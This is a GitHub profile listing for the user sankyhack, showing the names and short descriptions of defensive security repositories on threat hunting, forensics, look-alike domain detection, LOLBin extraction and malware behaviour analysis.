Pinned Repositories
tracee
Linux Runtime Security and Forensics using eBPF
CobaltStrike-TLS-Metadata-Analysis
ExtractLOLBin
Script is written to fetch LOLBin Details from Security and Sysmon EVTX file.
Linux-Forensics-Tools-Capabilities
This repository contains simple CSV file which list the artifacts gather by Linux forensic tools
Playing-with-Process-Data-of-10k-Malware-Sample
Purpose of this analysis is to understand the common behavior seen like locations from where malware runs, commonly used LOLBins, processes that communicate with internet and some hunting
PowerShell-Reversing
Similar-looking-domain-detection-using-python-fuzzywuzzy
Major cause of phishing and BEC incident is similar looking domain, if you detect it early, you can prevent incidents early, python fuzzywuzzy module let you do that
SysmonConfig-Blank
Threat-Hunting-with-WebProxy-Logs-using-Pandas---Jupyter-Notebook
Vectra-AI
Scripts are written to fetch rules and certain detections from Vectra AI
sankyhack's Repositories
sankyhack/Threat-Hunting-with-WebProxy-Logs-using-Pandas---Jupyter-Notebook
sankyhack/ExtractLOLBin
Script is written to fetch LOLBin Details from Security and Sysmon EVTX file.
sankyhack/Similar-looking-domain-detection-using-python-fuzzywuzzy
Major cause of phishing and BEC incident is similar looking domain, if you detect it early, you can prevent incidents early, python fuzzywuzzy module let you do that
sankyhack/Vectra-AI
Scripts are written to fetch rules and certain detections from Vectra AI
sankyhack/Linux-Forensics-Tools-Capabilities
This repository contains simple CSV file which list the artifacts gather by Linux forensic tools
sankyhack/Playing-with-Process-Data-of-10k-Malware-Sample
Purpose of this analysis is to understand the common behavior seen like locations from where malware runs, commonly used LOLBins, processes that communicate with internet and some hunting
sankyhack/CobaltStrike-TLS-Metadata-Analysis
sankyhack/PowerShell-Reversing
sankyhack/SysmonConfig-Blank